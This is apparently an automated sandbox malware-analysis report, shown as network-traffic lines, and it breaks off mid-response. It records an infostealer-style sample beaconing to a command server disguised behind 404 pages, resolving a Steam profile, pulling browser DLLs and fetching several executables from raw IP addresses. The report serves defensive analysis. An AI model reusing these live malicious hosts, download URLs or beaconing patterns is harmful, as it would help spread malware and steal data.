Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bduckycvwfnemtxt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejfrahknvjij.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmlyvkkabycy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddteakwbikxqkc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovxmwniqpjexkcks.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvvhbwqetcr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umfomwabnghpfpsy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frlbymqtkyyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bmuwkpviysjlmpaf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://olwhnfqjomykugd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sgvkxotchkel.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oosdileuucnskppc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://caudwrxwdlvda.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: dbfhns.in
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Code function: 9_2_6CC9CC60 PR_Recv, 9_2_6CC9CC60
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: dbfhns.in
Source: global traffic DNS traffic detected: DNS query: whispedwoodmoodsksl.shop
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:30:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 